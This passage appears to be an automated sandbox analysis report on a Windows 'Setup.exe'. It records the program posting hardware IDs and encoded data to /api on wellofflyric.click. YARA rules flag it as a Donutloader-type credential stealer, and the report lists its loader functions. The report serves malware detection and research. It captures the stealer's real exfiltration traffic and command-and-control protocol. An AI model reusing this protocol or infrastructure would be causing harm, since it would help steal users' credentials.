D0klqMzVhXhARqJuPFqs5L7VplnEbiNf4mdKe0lWPDQQDj3fzJuFH15I+ip1WsG34oD0HIJzUUu6fwdmBUxvd0AbPcnM2sZVHAC5OGddp9mQ0K1M2SIEFLomSDAdLX06EhsygJqQ1UBCDqsjaFrXp/zfqkPQJBMb5nZMfFNYOStARz2Ah5LXSQlJqzhpCprit5epXtgvQxq0c0x8QxkodhEffoeL0c1WAwr6ESpagafom5RM2y0EQuUrZ3tJFzE
2024-12-24 00:26:34 UTC	1369	IN	Data Raw: 64 2f 4d 6d 34 55 66 58 45 6a 36 4b 6e 56 61 77 62 66 69 67 50 51 63 67 6e 4e 52 53 37 70 2f 42 32 59 46 54 47 35 33 51 42 73 39 79 63 7a 61 79 30 6f 50 42 62 51 74 64 67 69 66 35 4b 62 59 35 6e 48 72 42 67 35 5a 38 57 68 41 54 6e 73 31 4e 79 6b 4e 42 6e 71 76 73 71 72 55 51 42 35 45 6e 43 31 79 47 64 6d 70 38 4d 50 68 46 35 55 43 43 55 54 35 61 55 41 77 43 31 51 35 65 56 68 4a 57 4a 79 42 6d 4d 74 41 54 43 65 77 50 6d 6b 56 6e 71 66 2b 6d 36 30 50 6a 57 4d 43 58 75 52 72 53 48 63 4a 45 79 63 2b 51 45 63 39 6e 38 7a 46 68 55 59 45 46 72 63 68 59 31 61 66 36 62 36 62 76 67 48 4d 59 78 55 55 72 44 55 4a 4d 46 64 55 5a 58 6c 48 42 33 43 51 6a 35 50 47 56 52 77 41 75 54 68 6e 58 61 66 5a 6c 64 61 73 53 74 73 6b 50 57 72 56 62 46 64 39 53 68 4e 2f 47 51 63 66 Data Ascii: d/Mm4UfXEj6KnVawbfigPQcgnNRS7p/B2YFTG53QBs9yczay0oPBbQtdgif5KbY5nHrBg5Z8WhATns1NykNBnqvsqrUQB5EnC1yGdmp8MPhF5UCCUT5aUAwC1Q5eVhJWJyBmMtATCewPmkVnqf+m60PjWMCXuRrSHcJEyc+QEc9n8zFhUYEFrchY1af6b6bvgHMYxUUrDUJMFdUZXlHB3CQj5PGVRwAuThnXafZldasStskPWrVbFd9ShN/GQcf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	188.114.96.6	443	6996	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:26:36 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9CYIVA85NA8CTJI3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18150 Host: wellofflyric.click
2024-12-24 00:26:36 UTC	15331	OUT	Data Raw: 2d 2d 39 43 59 49 56 41 38 35 4e 41 38 43 54 4a 49 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 30 41 31 46 30 31 36 35 32 30 42 41 44 34 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 39 43 59 49 56 41 38 35 4e 41 38 43 54 4a 49 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 43 59 49 56 41 38 35 4e 41 38 43 54 4a 49 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 39 43 59 Data Ascii: --9CYIVA85NA8CTJI3Content-Disposition: form-data; name="hwid"270A1F016520BAD4312F742701D40858--9CYIVA85NA8CTJI3Content-Disposition: form-data; name="pid"2--9CYIVA85NA8CTJI3Content-Disposition: form-data; name="lid"hRjzG3--ALFA--9CY
2024-12-24 00:26:36 UTC	2819	OUT	Data Raw: 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 Data Ascii: h/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!
2024-12-24 00:26:37 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:26:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pgfddt6nf9q57fugq4j8fr0pau; expires=Fri, 18 Apr 2025 18:13:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wPNX%2BkkHlolnqJ5m3BRnhAUX9E8vrrEFBuftomFCgH1qM6dJPbmw3xH9bHRIdjKbINkaMpLcW3sB7WvkqREWr4%2FOTXZx71fNKyM35BqUZ2%2F4gXpu7boKfGtTdBMzuOM8D9pSksQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c75f9ffa18ce2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2123&min_rtt=1998&rtt_var=838&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19112&delivery_rate=1461461&cwnd=202&unsent_bytes=0&cid=5dd98cea35c23c60&ts=978&x=0"
2024-12-24 00:26:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:26:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	188.114.96.6	443	6996	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:26:38 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=92E1L8OPNHAWBGBOM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8777 Host: wellofflyric.click
2024-12-24 00:26:38 UTC	8777	OUT	Data Raw: 2d 2d 39 32 45 31 4c 38 4f 50 4e 48 41 57 42 47 42 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 30 41 31 46 30 31 36 35 32 30 42 41 44 34 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 39 32 45 31 4c 38 4f 50 4e 48 41 57 42 47 42 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 32 45 31 4c 38 4f 50 4e 48 41 57 42 47 42 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d Data Ascii: --92E1L8OPNHAWBGBOMContent-Disposition: form-data; name="hwid"270A1F016520BAD4312F742701D40858--92E1L8OPNHAWBGBOMContent-Disposition: form-data; name="pid"2--92E1L8OPNHAWBGBOMContent-Disposition: form-data; name="lid"hRjzG3--ALFA--
2024-12-24 00:26:39 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:26:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qlev9jocvqg75qaohk0s2iahea; expires=Fri, 18 Apr 2025 18:13:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2z5dBoxzwN7Ug2OWI1S8lLyF3NdyILJOaQDma1M23akQdZF6a9GS958%2BidHRNzK%2F1XH18yXv6BfT2eR45tKwnyx6gpF9QptaNhY238uwY6LoughD%2BnvIMmufFMNMslwZTY%2FGs1Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c76084ba48c65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1997&rtt_var=758&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9717&delivery_rate=1434184&cwnd=204&unsent_bytes=0&cid=2b17b34915ef12e7&ts=809&x=0"
2024-12-24 00:26:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:26:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	188.114.96.6	443	6996	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:26:40 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6ZVL460M User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20376 Host: wellofflyric.click
2024-12-24 00:26:40 UTC	15331	OUT	Data Raw: 2d 2d 36 5a 56 4c 34 36 30 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 30 41 31 46 30 31 36 35 32 30 42 41 44 34 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 36 5a 56 4c 34 36 30 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 5a 56 4c 34 36 30 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 36 5a 56 4c 34 36 30 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 Data Ascii: --6ZVL460MContent-Disposition: form-data; name="hwid"270A1F016520BAD4312F742701D40858--6ZVL460MContent-Disposition: form-data; name="pid"3--6ZVL460MContent-Disposition: form-data; name="lid"hRjzG3--ALFA--6ZVL460MContent-Dispositi
2024-12-24 00:26:40 UTC	5045	OUT	Data Raw: b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00 00 Data Ascii: Mn 64F6(X&7~`aO@dR<x)
2024-12-24 00:26:41 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:26:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rtufmemc26rp77np9uc6chrb3j; expires=Fri, 18 Apr 2025 18:13:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lG5tb9%2BRX%2FuJHpEYicjTnQl1wSP3QIsfwDpnVWHDHRg0Wa1NY2iTqEr9pg837bvbtaj7DdOB81aWVpi8z3WcrgFAX7JOqnpoW1nCrOg1mxb5erGRK5iI3M8C%2B7208WhgNpaCOUQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c76162bd7c47c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1638&rtt_var=628&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21330&delivery_rate=1782661&cwnd=210&unsent_bytes=0&cid=716a895956f86848&ts=968&x=0"
2024-12-24 00:26:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:26:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	188.114.96.6	443	6996	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:26:43 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ACS0CA28XLGQ18CTLUK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1264 Host: wellofflyric.click
2024-12-24 00:26:43 UTC	1264	OUT	Data Raw: 2d 2d 41 43 53 30 43 41 32 38 58 4c 47 51 31 38 43 54 4c 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 30 41 31 46 30 31 36 35 32 30 42 41 44 34 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 41 43 53 30 43 41 32 38 58 4c 47 51 31 38 43 54 4c 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 43 53 30 43 41 32 38 58 4c 47 51 31 38 43 54 4c 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c Data Ascii: --ACS0CA28XLGQ18CTLUKContent-Disposition: form-data; name="hwid"270A1F016520BAD4312F742701D40858--ACS0CA28XLGQ18CTLUKContent-Disposition: form-data; name="pid"1--ACS0CA28XLGQ18CTLUKContent-Disposition: form-data; name="lid"hRjzG3--AL
2024-12-24 00:26:44 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:26:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d43dminl3s6dr84ipil53r7kq8; expires=Fri, 18 Apr 2025 18:13:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aQdsHjA84QSxAQmHmZs6adeOVdybdC%2Fb1HpSmXWTGzU5aD9gQPbSb7QfLxPAIWn4a1cjRtWlU55Nl10GY9%2BJGbTvYYMugIlm8uicgG50mYDp6oeYTkiiZoCZvRmUlKw2QG7Lr0k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c7625acefefa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1869&rtt_var=721&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2184&delivery_rate=1497435&cwnd=200&unsent_bytes=0&cid=dd6afd42831c35f1&ts=793&x=0"
2024-12-24 00:26:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:26:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	188.114.96.6	443	6996	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:26:45 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OWPLOHXQDR9TJN6O User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1102 Host: wellofflyric.click
2024-12-24 00:26:45 UTC	1102	OUT	Data Raw: 2d 2d 4f 57 50 4c 4f 48 58 51 44 52 39 54 4a 4e 36 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 30 41 31 46 30 31 36 35 32 30 42 41 44 34 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 4f 57 50 4c 4f 48 58 51 44 52 39 54 4a 4e 36 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 57 50 4c 4f 48 58 51 44 52 39 54 4a 4e 36 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 4f 57 50 Data Ascii: --OWPLOHXQDR9TJN6OContent-Disposition: form-data; name="hwid"270A1F016520BAD4312F742701D40858--OWPLOHXQDR9TJN6OContent-Disposition: form-data; name="pid"1--OWPLOHXQDR9TJN6OContent-Disposition: form-data; name="lid"hRjzG3--ALFA--OWP
2024-12-24 00:26:46 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:26:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d627t1c1970pgeqh5216vrr9i9; expires=Fri, 18 Apr 2025 18:13:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oej3DV5MIy%2F6hf4wJL4p9DIE0jGnfy%2F6NLdi18X3RqpRUvWvxriNK97RwvioqqvNFnfyUGgT%2FkfIUC6AcPwDIOnKJI8Z9pXsnZdVkWOSSo8Qcid4nV7yQTJm8CGlAauIjCs%2FFRM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c7632aeb34264-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1771&rtt_var=666&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2019&delivery_rate=1641371&cwnd=223&unsent_bytes=0&cid=a1783ca244cd71db&ts=1134&x=0"
2024-12-24 00:26:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:26:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	19:26:07
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup.exe"
Imagebase:	0x400000
File size:	74'566'691 bytes
MD5 hash:	894026775541F481A5FCDF15927A09B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2029575084.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2080291766.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	28.7%
Signature Coverage:	38.8%
Total number of Nodes:	320
Total number of Limit Nodes:	19

Executed Functions

Function 00423C1C Relevance: 21.4, APIs: 14, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c1a4f64fa262a1fdab3a1b7a2ce187f8b3889d2e7379cc2604adef1b5ea15e
Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
Opcode Fuzzy Hash: 58c1a4f64fa262a1fdab3a1b7a2ce187f8b3889d2e7379cc2604adef1b5ea15e
Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08

Function 00430A20 Relevance: 19.1, APIs: 3, Strings: 7, Instructions: 1579
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,-CBE63293), ref: 00430F2D
GetProcAddress.KERNEL32(00000000), ref: 004318AE
VirtualAlloc.KERNEL32(?,0004F300,?,-77B5E340,?,?,?,02B982F6), ref: 00431EF7

Strings

ualA, xrefs: 00431D78
va\D, xrefs: 00431EC7
lloc, xrefs: 00431683
ublA, xrefs: 00431ACB
Uirt, xrefs: 00431C8E
Virt, xrefs: 004317E1
V)rt, xrefs: 00432077

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressAllocHandleModuleProcVirtual
String ID: Uirt$V)rt$Virt$lloc$ualA$ublA$va\D
API String ID: 3695083113-2059723026
Opcode ID: 25f4937465619e85f00e10a00ee7d911089e9d91b2618bb9cdd77c259ac8da3c
Instruction ID: f6548b092d108241cf83bf967db5bc3e6f8e795671c57dc6e83cd93b018456ba
Opcode Fuzzy Hash: 25f4937465619e85f00e10a00ee7d911089e9d91b2618bb9cdd77c259ac8da3c
Instruction Fuzzy Hash: B0B2F4739143208FD758EFBEEC8615A37A2F7A0319346963FD40297166DF385D428A8E

Function 0043114C Relevance: 16.9, APIs: 2, Strings: 7, Instructions: 1127
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000), ref: 004318AE
VirtualAlloc.KERNEL32(?,0004F300,?,-77B5E340,?,?,?,02B982F6), ref: 00431EF7

Strings

ualA, xrefs: 00431D78
va\D, xrefs: 00431EC7
lloc, xrefs: 00431683
ublA, xrefs: 00431ACB
Uirt, xrefs: 00431C8E
Virt, xrefs: 004317E1
V)rt, xrefs: 00432077

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressAllocProcVirtual
